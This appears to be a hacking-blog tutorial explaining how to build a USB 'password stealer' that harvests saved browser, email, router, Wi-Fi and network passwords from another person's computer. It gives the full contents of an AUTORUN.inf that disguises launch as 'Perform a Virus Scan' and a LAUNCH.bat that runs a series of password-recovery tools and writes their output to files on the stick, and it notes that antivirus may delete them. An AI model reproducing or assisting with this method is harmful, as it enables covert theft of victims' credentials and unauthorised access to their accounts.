Steal All Passwords Of Computer Using USB
How to steal passwords from a computer with USB in just seconds???
Here is the tutorial you want fanz, you can steal any pass means all passwords related to that computer. it can also steal once saved browser passes.
How to make stealer?
Download This Ready made Files or make your own way as shown below. Pass Stealer
Or Custom Making of stealer:
Type or copy/paste Text below:-
ACTION= Perform a Virus Scan
Save this as AUTORUN.inf (NOTE: extension must be .inf not .txt)
Step 2: Now again open Notepad and Create a new file.
Type or copy/paste Text below…
start mspass.exe /stext pass/mspass.txt
start mailpv.exe /stext pass/mailpv.txt
start iepv.exe /stext pass/iepv.txt
start pspv.exe /stext pass/pspv.txt
start PasswordFox.exe /stext pass/passwordfox.txt
start OperaPassView.exe /stext pass/OperaPassView.txt
start ChromePass.exe /stext pass/ChromePass.txt
start WebBrowserPassView.exe /stext pass/AllBrowserPass.txt
start mspass.exe /stext pass/msofficepass.txt
start RouterPassView.exe /stext pass/Router.txt
start Dialupass.exe /stext pass/Dialupass.txt
start netpass.exe /stext pass/netpass.txt
start WirelessKeyView.exe /stext pass/WirelessKeyView.txt
Save this as LAUNCH.bat
Now you have 2 files…
Step 3: Copy the autorun and launch file to your USB…
Step 4: Go to
And download the programs which you named in Step 2… and copy them with your other files that is autorun and launch.bat files.
How to use?
- Now copy our ready made pass stealer files or your setup files to your usb drive.
- Now re-plug USB.
- Choose Perform A Virus Scan Option, on auto-run menu.
- Era..!!! All Pass r steal and in pass folder.
- You can run launch.bat file direct and steal pass.
Note: These File are may be deleted by antivirus. So be care-full.
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